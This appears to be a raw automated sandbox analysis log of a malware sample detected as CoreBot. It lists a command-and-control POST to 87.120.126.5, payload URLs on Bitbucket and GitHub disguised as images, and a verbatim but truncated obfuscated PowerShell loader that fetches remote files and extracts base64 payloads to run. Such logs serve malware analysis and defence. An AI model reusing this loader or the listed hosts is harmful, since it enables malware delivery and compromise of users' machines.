                  Source: unknownHTTP traffic detected: POST /VmCetSC7/page.php HTTP/1.1User-Agent: E9BC3BD76216AFA560BFB5ACAF5731A3Content-Type: application/x-www-form-urlencodedHost: 87.120.126.5Content-Length: 471Expect: 100-continueConnection: Keep-Alive
                  Source: MSBuild.exe, 00000008.00000002.4125122476.0000000003168000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000008.00000002.4125122476.0000000003260000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000008.00000002.4125122476.000000000322D000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000008.00000002.4125122476.0000000003103000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000008.00000002.4125122476.00000000031F4000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000008.00000002.4125122476.00000000030D0000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000008.00000002.4125122476.00000000030E5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://87.120.126.5
                  Source: MSBuild.exe, 00000008.00000002.4125122476.0000000002FB8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://87.120.126.5/VmCetSC7/page.php
                  Source: MSBuild.exe, 00000008.00000002.4125122476.0000000003168000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000008.00000002.4125122476.0000000003260000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000008.00000002.4125122476.000000000322D000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000008.00000002.4125122476.0000000003103000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000008.00000002.4125122476.00000000031F4000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000008.00000002.4125122476.000000000307C000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000008.00000002.4125122476.00000000030E5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://87.120.126.5/VmCetSC7/page.phpP
                  Source: powershell.exe, 00000006.00000002.1823716932.000001D3BB7DE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://bbuseruploads.s3.amazonaws.com
                  Source: powershell.exe, 00000006.00000002.1823716932.000001D3BB7DA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://bitbucket.org
                  Source: powershell.exe, 00000006.00000002.1823716932.000001D3B44B9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
                  Source: powershell.exe, 00000006.00000002.1823716932.000001D3BB7DE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://s3-w.us-east-1.amazonaws.com
                  Source: powershell.exe, 00000006.00000002.1823716932.000001D3BB37F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
                  Source: powershell.exe, 00000004.00000002.2060947701.000002084DAEC000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1823716932.000001D3B4291000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000008.00000002.4125122476.000000000307C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                  Source: powershell.exe, 00000006.00000002.1823716932.000001D3BB37F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/wsdl/
                  Source: powershell.exe, 00000006.00000002.1823716932.000001D3B44B9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
                  Source: powershell.exe, 00000004.00000002.2060947701.000002084DA7D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2060947701.000002084DAC5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1823716932.000001D3B4291000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore68
                  Source: powershell.exe, 00000006.00000002.1823716932.000001D3BB37F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1823716932.000001D3BBCFF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/winsvr-2022-pshelp
                  Source: powershell.exe, 00000006.00000002.1823716932.000001D3BBFBB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1823716932.000001D3BBFE1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/winsvr-2022-pshelpX
                  Source: powershell.exe, 00000006.00000002.1823716932.000001D3BB7DE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1823716932.000001D3B468F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1823716932.000001D3B4697000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1823716932.000001D3B4693000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aui-cdn.atlassian.com/
                  Source: powershell.exe, 00000006.00000002.1823716932.000001D3B46AC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://bbc-frontbucket-canary.prod-east.frontend.public.atl-paas.net
                  Source: powershell.exe, 00000006.00000002.1823716932.000001D3B46AC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://bbc-frontbucket-exp.prod-east.frontend.public.atl-paas.net
                  Source: powershell.exe, 00000006.00000002.1823716932.000001D3B46AC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://bbc-frontbucket-static.prod-east.frontend.public.atl-paas.net
                  Source: powershell.exe, 00000006.00000002.1823716932.000001D3B46AC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://bbc-frontbucket-static.stg-east.frontend.public.atl-paas.net
                  Source: powershell.exe, 00000006.00000002.1823716932.000001D3B46AC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://bbc-object-storage--frontbucket.us-east-1.prod.public.atl-paas.net/
                  Source: powershell.exe, 00000006.00000002.1823716932.000001D3B46AC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://bbc-object-storage--frontbucket.us-east-1.prod.public.atl-paas.net/;
                  Source: powershell.exe, 00000006.00000002.1823716932.000001D3B46AC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://bbc-object-storage--frontbucket.us-east-1.staging.public.atl-paas.net/
                  Source: powershell.exe, 00000006.00000002.1823716932.000001D3BB7DE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://bbuseruploads.s3.amazonaws.com
                  Source: powershell.exe, 00000006.00000002.1823716932.000001D3B4697000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://bbuseruploads.s3.amazonaws.com/d0a43d21-72a8-4789-9e4a-6c02f03bb585/downloads/196619b4-f993-
                  Source: powershell.exe, 00000006.00000002.1823716932.000001D3BB7DE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://bbuseruploads.s3.amazonaws.com/e3c0f433-171c-46e2-89e0-333c78666859/downloads/b6ce439c-77f0-
                  Source: powershell.exe, 00000006.00000002.1823716932.000001D3B44B9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1823716932.000001D3BB37F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://bitbucket.org
                  Source: powershell.exe, 00000006.00000002.1823716932.000001D3BB37F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://bitbucket.org/fqwfwrqwe/werwfqwf/downloads/pbbcnnk.txt
                  Source: powershell.exe, 00000004.00000002.2060947701.000002084E01B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1821895175.000001D3B26F0000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1823716932.000001D3B4291000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1823716932.000001D3B44B9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1822123956.000001D3B275F000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1823716932.000001D3BBBB8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1822909163.000001D3B2A14000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1822123956.000001D3B2740000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1822123956.000001D3B27C5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://bitbucket.org/ghjkkkkkkkk/tdrdreest/downloads/img.jpg?537612
                  Source: powershell.exe, 00000006.00000002.1823716932.000001D3BB7DE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1823716932.000001D3B468F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1823716932.000001D3B4697000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1823716932.000001D3B4693000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://cdn.cookielaw.org/
                  Source: powershell.exe, 00000006.00000002.1823716932.000001D3BB7DE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1823716932.000001D3B468F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1823716932.000001D3B467A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1823716932.000001D3B4697000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1823716932.000001D3B4693000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1823716932.000001D3B46AC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://dz8aopenkvv6s.cloudfront.net
                  Source: powershell.exe, 00000006.00000002.1823716932.000001D3B44B9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
                  Source: powershell.exe, 00000006.00000002.1823716932.000001D3B4697000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://raw.githubusercontent.com
                  Source: powershell.exe, 00000004.00000002.2060947701.000002084E01B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1821895175.000001D3B26F0000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1823716932.000001D3B4291000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1823716932.000001D3B44B9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1822123956.000001D3B275F000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1823716932.000001D3BBBB8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1822909163.000001D3B2A14000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1822123956.000001D3B2740000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1822123956.000001D3B27C5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://raw.githubusercontent.com/gmedusa135/nano/refs/heads/main/new_img123.jpg
                  Source: powershell.exe, 00000006.00000002.1823716932.000001D3BB7DE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1823716932.000001D3B468F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1823716932.000001D3B467A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1823716932.000001D3B4697000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1823716932.000001D3B4693000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1823716932.000001D3B46AC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://remote-app-switcher.prod-east.frontend.public.atl-paas.net
                  Source: powershell.exe, 00000006.00000002.1823716932.000001D3BB7DE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1823716932.000001D3B468F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1823716932.000001D3B467A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1823716932.000001D3B4697000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1823716932.000001D3B4693000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1823716932.000001D3B46AC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://remote-app-switcher.stg-east.frontend.public.atl-paas.net
                  Source: powershell.exe, 00000006.00000002.1823716932.000001D3BB7DE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1823716932.000001D3B468F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1823716932.000001D3B467A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1823716932.000001D3B4697000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1823716932.000001D3B4693000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1823716932.000001D3B46AC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://web-security-reports.services.atlassian.com/csp-report/bb-website
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49733
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49777
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49675 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49732
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49731
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49730
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49731 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49732 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49672 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49730 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49777 -> 443
                  Source: unknownHTTPS traffic detected: 185.166.143.48:443 -> 192.168.2.4:49730 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 185.199.111.133:443 -> 192.168.2.4:49731 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 52.216.138.83:443 -> 192.168.2.4:49733 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 173.222.162.32:443 -> 192.168.2.4:49777 version: TLS 1.2

                  Operating System Destruction

                  barindex
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: 01 00 00 00 Jump to behavior

                  System Summary

                  barindex
                  Source: 8.2.MSBuild.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects CoreBot Author: ditekSHen
                  Source: 6.2.powershell.exe.1d3bba895c8.2.unpack, type: UNPACKEDPEMatched rule: Detects CoreBot Author: ditekSHen
                  Source: 6.2.powershell.exe.1d3bba895c8.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects CoreBot Author: ditekSHen
                  Source: Process Memory Space: powershell.exe PID: 7840, type: MEMORYSTRMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
                  Source: Process Memory Space: powershell.exe PID: 8000, type: MEMORYSTRMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
                  Source: C:\Windows\System32\wscript.exeCOM Object queried: Windows Script Host Network Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{093FF999-1EA0-4079-9525-9614C3504B74}Jump to behavior
                  Source: C:\Windows\System32\wscript.exeCOM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}Jump to behavior
                  Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$dosigo = 'WwBO$GU$d$$u$FM$ZQBy$HY$aQBj$GU$U$Bv$Gk$bgB0$E0$YQBu$GE$ZwBl$HI$XQ$6$Do$UwBl$GM$dQBy$Gk$d$B5$F$$cgBv$HQ$bwBj$G8$b$$g$D0$I$Bb$E4$ZQB0$C4$UwBl$GM$dQBy$Gk$d$B5$F$$cgBv$HQ$bwBj$G8$b$BU$Hk$c$Bl$F0$Og$6$FQ$b$Bz$DE$Mg$N$$o$I$$g$C$$I$$g$C$$I$$g$C$$I$$g$C$$ZgB1$G4$YwB0$Gk$bwBu$C$$R$Bv$Hc$bgBs$G8$YQBk$EQ$YQB0$GE$RgBy$G8$bQBM$Gk$bgBr$HM$I$B7$C$$c$Bh$HI$YQBt$C$$K$Bb$HM$d$By$Gk$bgBn$Fs$XQBd$CQ$b$Bp$G4$awBz$Ck$I$$N$$o$I$$g$C$$I$$g$C$$I$$g$C$$I$$g$C$$J$B3$GU$YgBD$Gw$aQBl$G4$d$$g$D0$I$BO$GU$dw$t$E8$YgBq$GU$YwB0$C$$UwB5$HM$d$Bl$G0$LgBO$GU$d$$u$Fc$ZQBi$EM$b$Bp$GU$bgB0$Ds$I$$N$$o$I$$g$C$$I$$g$C$$I$$g$C$$I$$g$C$$J$Bz$Gg$dQBm$GY$b$Bl$GQ$T$Bp$G4$awBz$C$$PQ$g$Ec$ZQB0$C0$UgBh$G4$Z$Bv$G0$I$$t$Ek$bgBw$HU$d$BP$GI$agBl$GM$d$$g$CQ$b$Bp$G4$awBz$C$$LQBD$G8$dQBu$HQ$I$$k$Gw$aQBu$Gs$cw$u$Ew$ZQBu$Gc$d$Bo$Ds$I$$N$$o$I$$g$C$$I$$g$C$$I$$g$C$$I$$g$C$$ZgBv$HI$ZQBh$GM$a$$g$Cg$J$Bs$Gk$bgBr$C$$aQBu$C$$J$Bz$Gg$dQBm$GY$b$Bl$GQ$T$Bp$G4$awBz$Ck$I$B7$C$$d$By$Hk$I$B7$C$$cgBl$HQ$dQBy$G4$I$$k$Hc$ZQBi$EM$b$Bp$GU$bgB0$C4$R$Bv$Hc$bgBs$G8$YQBk$EQ$YQB0$GE$K$$k$Gw$aQBu$Gs$KQ$g$H0$I$Bj$GE$d$Bj$Gg$I$B7$C$$YwBv$G4$d$Bp$G4$dQBl$C$$fQ$g$H0$Ow$g$$0$Cg$g$C$$I$$g$C$$I$$g$C$$I$$g$C$$I$By$GU$d$B1$HI$bg$g$CQ$bgB1$Gw$b$$g$H0$Ow$g$$0$Cg$g$C$$I$$g$C$$I$$g$C$$I$$g$C$$I$$k$Gw$aQBu$Gs$cw$g$D0$I$B$$Cg$JwBo$HQ$d$Bw$HM$Og$v$C8$YgBp$HQ$YgB1$GM$awBl$HQ$LgBv$HI$Zw$v$Gc$a$Bq$Gs$awBr$Gs$awBr$Gs$aw$v$HQ$Z$By$GQ$cgBl$GU$cwB0$C8$Z$Bv$Hc$bgBs$G8$YQBk$HM$LwBp$G0$Zw$u$Go$c$Bn$D8$NQ$z$Dc$Ng$x$DI$Jw$s$C$$JwBo$HQ$d$Bw$HM$Og$v$C8$cgBh$Hc$LgBn$Gk$d$Bo$HU$YgB1$HM$ZQBy$GM$bwBu$HQ$ZQBu$HQ$LgBj$G8$bQ$v$Gc$bQBl$GQ$dQBz$GE$MQ$z$DU$LwBu$GE$bgBv$C8$cgBl$GY$cw$v$Gg$ZQBh$GQ$cw$v$G0$YQBp$G4$LwBu$GU$dwBf$Gk$bQBn$DE$Mg$z$C4$agBw$Gc$Jw$p$Ds$DQ$K$C$$I$$g$C$$I$$g$C$$I$$g$C$$I$$g$C$$J$Bp$G0$YQBn$GU$QgB5$HQ$ZQBz$C$$PQ$g$EQ$bwB3$G4$b$Bv$GE$Z$BE$GE$d$Bh$EY$cgBv$G0$T$Bp$G4$awBz$C$$J$Bs$Gk$bgBr$HM$Ow$N$$o$I$$g$C$$I$$g$C$$I$$g$C$$I$$g$C$$I$Bp$GY$I$$o$CQ$aQBt$GE$ZwBl$EI$eQB0$GU$cw$g$C0$bgBl$C$$J$Bu$HU$b$Bs$Ck$I$B7$C$$J$Bp$G0$YQBn$GU$V$Bl$Hg$d$$g$D0$I$Bb$FM$eQBz$HQ$ZQBt$C4$V$Bl$Hg$d$$u$EU$bgBj$G8$Z$Bp$G4$ZwBd$Do$OgBV$FQ$Rg$4$C4$RwBl$HQ$UwB0$HI$aQBu$Gc$K$$k$Gk$bQBh$Gc$ZQBC$Hk$d$Bl$HM$KQ$7$$0$Cg$g$C$$I$$g$C$$I$$g$C$$I$$g$C$$I$$g$CQ$cwB0$GE$cgB0$EY$b$Bh$Gc$I$$9$C$$Jw$8$Dw$QgBB$FM$RQ$2$DQ$XwBT$FQ$QQBS$FQ$Pg$+$Cc$Ow$g$CQ$ZQBu$GQ$RgBs$GE$Zw$g$D0$I$$n$Dw$P$BC$EE$UwBF$DY$N$Bf$EU$TgBE$D4$Pg$n$Ds$I$$k$HM$d$Bh$HI$d$BJ$G4$Z$Bl$Hg$I$$9$C$$J$Bp$G0$YQBn$GU$V$Bl$Hg$d$$u$Ek$bgBk$GU$e$BP$GY$K$$k$HM$d$Bh$HI$d$BG$Gw$YQBn$Ck$Ow$g$$0$Cg$g$C$$I$$g$C$$I$$g$C$$I$$g$C$$I$$k$GU$bgBk$Ek$bgBk$GU$e$$g$D0$I$$k$Gk$bQBh$Gc$ZQBU$GU$e$B0$C4$SQBu$GQ$ZQB4$E8$Zg$o$CQ$ZQBu$GQ$RgBs$GE$Zw$p$Ds$DQ$K$C$$I$$g$C$$I$$g$C$$I$$g$C$$I$$g$C$$aQBm$C$$K$$k$HM$d$Bh$HI$d$BJ$G4$Z$Bl$Hg$I$$t$Gc$ZQ$g$D$$I$$t$GE$bgBk$C$$J$Bl$G4$Z$BJ$G4$Z$Bl$Hg$I$$t$Gc$d$$g$CQ$cwB0$GE$cgB0$Ek$bgBk$GU$e$$p$C$$ew$g$CQ$cwB0$GE$cgB0$Ek$bgBk$GU$e$$g$Cs$PQ$g$CQ$cwB0$GE$cgB0$EY$b$Bh$Gc$LgBM$GU$bgBn$HQ$a$$7$C$$DQ$K$C
                  Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$dosigo = 'WwBO$GU$d$$u$FM$ZQBy$HY$aQBj$GU$U$Bv$Gk$bgB0$E0$YQBu$GE$ZwBl$HI$XQ$6$Do$UwBl$GM$dQBy$Gk$d$B5$F$$cgBv$HQ$bwBj$G8$b$$g$D0$I$Bb$E4$ZQB0$C4$UwBl$GM$dQBy$Gk$d$B5$F$$cgBv$HQ$bwBj$G8$b$BU$Hk$c$Bl$F0$Og$6$FQ$b$Bz$DE$Mg$N$$o$I$$g$C$$I$$g$C$$I$$g$C$$I$$g$C$$ZgB1$G4$YwB0$Gk$bwBu$C$$R$Bv$Hc$bgBs$G8$YQBk$EQ$YQB0$GE$RgBy$G8$bQBM$Gk$bgBr$HM$I$B7$C$$c$Bh$HI$YQBt$C$$K$Bb$HM$d$By$Gk$bgBn$Fs$XQBd$CQ$b$Bp$G4$awBz$Ck$I$$N$$o$I$$g$C$$I$$g$C$$I$$g$C$$I$$g$C$$J$B3$GU$YgBD$Gw$aQBl$G4$d$$g$D0$I$BO$GU$dw$t$E8$YgBq$GU$YwB0$C$$UwB5$HM$d$Bl$G0$LgBO$GU$d$$u$Fc$ZQBi$EM$b$Bp$GU$bgB0$Ds$I$$N$$o$I$$g$C$$I$$g$C$$I$$g$C$$I$$g$C$$J$Bz$Gg$dQBm$GY$b$Bl$GQ$T$Bp$G4$awBz$C$$PQ$g$Ec$ZQB0$C0$UgBh$G4$Z$Bv$G0$I$$t$Ek$bgBw$HU$d$BP$GI$agBl$GM$d$$g$CQ$b$Bp$G4$awBz$C$$LQBD$G8$dQBu$HQ$I$$k$Gw$aQBu$Gs$cw$u$Ew$ZQBu$Gc$d$Bo$Ds$I$$N$$o$I$$g$C$$I$$g$C$$I$$g$C$$I$$g$C$$ZgBv$HI$ZQBh$GM$a$$g$Cg$J$Bs$Gk$bgBr$C$$aQBu$C$$J$Bz$Gg$dQBm$GY$b$Bl$GQ$T$Bp$G4$awBz$Ck$I$B7$C$$d$By$Hk$I$B7$C$$cgBl$HQ$dQBy$G4$I$$k$Hc$ZQBi$EM$b$Bp$GU$bgB0$C4$R$Bv$Hc$bgBs$G8$YQBk$EQ$YQB0$GE$K$$k$Gw$aQBu$Gs$KQ$g$H0$I$Bj$GE$d$Bj$Gg$I$B7$C$$YwBv$G4$d$Bp$G4$dQBl$C$$fQ$g$H0$Ow$g$$0$Cg$g$C$$I$$g$C$$I$$g$C$$I$$g$C$$I$By$GU$d$B1$HI$bg$g$CQ$bgB1$Gw$b$$g$H0$Ow$g$$0$Cg$g$C$$I$$g$C$$I$$g$C$$I$$g$C$$I$$k$Gw$aQBu$Gs$cw$g$D0$I$B$$Cg$JwBo$HQ$d$Bw$HM$Og$v$C8$YgBp$HQ$YgB1$GM$awBl$HQ$LgBv$HI$Zw$v$Gc$a$Bq$Gs$awBr$Gs$awBr$Gs$aw$v$HQ$Z$By$GQ$cgBl$GU$cwB0$C8$Z$Bv$Hc$bgBs$G8$YQBk$HM$LwBp$G0$Zw$u$Go$c$Bn$D8$NQ$z$Dc$Ng$x$DI$Jw$s$C$$JwBo$HQ$d$Bw$HM$Og$v$C8$cgBh$Hc$LgBn$Gk$d$Bo$HU$YgB1$HM$ZQBy$GM$bwBu$HQ$ZQBu$HQ$LgBj$G8$bQ$v$Gc$bQBl$GQ$dQBz$GE$MQ$z$DU$LwBu$GE$bgBv$C8$cgBl$GY$cw$v$Gg$ZQBh$GQ$cw$v$G0$YQBp$G4$LwBu$GU$dwBf$Gk$bQBn$DE$Mg$z$C4$agBw$Gc$Jw$p$Ds$DQ$K$C$$I$$g$C$$I$$g$C$$I$$g$C$$I$$g$C$$J$Bp$G0$YQBn$GU$QgB5$HQ$ZQBz$C$$PQ$g$EQ$bwB3$G4$b$Bv$GE$Z$BE$GE$d$Bh$EY$cgBv$G0$T$Bp$G4$awBz$C$$J$Bs$Gk$bgBr$HM$Ow$N$$o$I$$g$C$$I$$g$C$$I$$g$C$$I$$g$C$$I$Bp$GY$I$$o$CQ$aQBt$GE$ZwBl$EI$eQB0$GU$cw$g$C0$bgBl$C$$J$Bu$HU$b$Bs$Ck$I$B7$C$$J$Bp$G0$YQBn$GU$V$Bl$Hg$d$$g$D0$I$Bb$FM$eQBz$HQ$ZQBt$C4$V$Bl$Hg$d$$u$EU$bgBj$G8$Z$Bp$G4$ZwBd$Do$OgBV$FQ$Rg$4$C4$RwBl$HQ$UwB0$HI$aQBu$Gc$K$$k$Gk$bQBh$Gc$ZQBC$Hk$d$Bl$HM$KQ$7$$0$Cg$g$C$$I$$g$C$$I$$g$C$$I$$g$C$$I$$g$CQ$cwB0$GE$cgB0$EY$b$Bh$Gc$I$$9$C$$Jw$8$Dw$QgBB$FM$RQ$2$DQ$XwBT$FQ$QQBS$FQ$Pg$+$Cc$Ow$g$CQ$ZQBu$GQ$RgBs$GE$Zw$g$D0$I$$n$Dw$P$BC$EE$UwBF$DY$N$Bf$EU$TgBE$D4$Pg$n$Ds$I$$k$HM$d$Bh$HI$d$BJ$G4$Z$Bl$Hg$I$$9$C$$J$Bp$G0$YQBn$GU$V$Bl$Hg$d$$u$Ek$bgBk$GU$e$BP$GY$K$$k$HM$d$Bh$HI$d$BG$Gw$YQBn$Ck$Ow$g$$0$Cg$g$C$$I$$g$C$$I$$g$C$$I$$g$C$$I$$k$GU$bgBk$Ek$bgBk$GU$e$$g$D0$I$$k$Gk$bQBh$Gc$ZQBU$GU$e$B0$C4$SQBu$GQ$ZQB4$E8$Zg$o$CQ$ZQBu$GQ$RgBs$GE$Zw$p$Ds$DQ$K$C$$I$$g$C$$I$$g$C$$I$$g$C$$I$$g$C$$aQBm$C$$K$$k$HM$d$Bh$HI$d$BJ$G4$Z$Bl$Hg$I$$t$Gc$ZQ$g$D$$I$$t$GE$bgBk$C$$J$Bl$G4$Z$BJ$G4$Z$Bl$Hg$I$$t$Gc$d$$g$CQ$cwB0$GE$cgB0$Ek$bgBk$GU$e$$p$C$$ew$g$CQ$cwB0$GE$cgB0$Ek$bgBk$GU$e$$g$Cs$PQ$g$CQ$cwB0$GE$cgB0$EY$b$Bh$Gc$LgBM$GU$bgBn$HQ$a$$7$C$$DQ$K$CJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess Stats: CPU usage > 49%
                  Source: C:\Users\user\Desktop\3lhrJ4X.exeCode function: 0_2_00007FF761F72C54 GetVersion,GetModuleHandleW,GetProcAddress,ExitWindowsEx,CloseHandle,0_2_00007FF761F72C54
                  Source: C:\Users\user\Desktop\3lhrJ4X.exeCode function: 0_2_00007FF761F71C0C GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,CloseHandle,ExitWindowsEx,0_2_00007FF761F71C0C
                  Source: C:\Users\user\Desktop\3lhrJ4X.exeCode function: 0_2_00007FF761F71D280_2_00007FF761F71D28
                  Source: C:\Users\user\Desktop\3lhrJ4X.exeCode function: 0_2_00007FF761F75D900_2_00007FF761F75D90
                  Source: C:\Users\user\Desktop\3lhrJ4X.exeCode function: 0_2_00007FF761F76CA40_2_00007FF761F76CA4
                  Source: C:\Users\user\Desktop\3lhrJ4X.exeCode function: 0_2_00007FF761F72DB40_2_00007FF761F72DB4
                  Source: C:\Users\user\Desktop\3lhrJ4X.exeCode function: 0_2_00007FF761F766C40_2_00007FF761F766C4
                  Source: C:\Users\user\Desktop\3lhrJ4X.exeCode function: 0_2_00007FF761F740C40_2_00007FF761F740C4
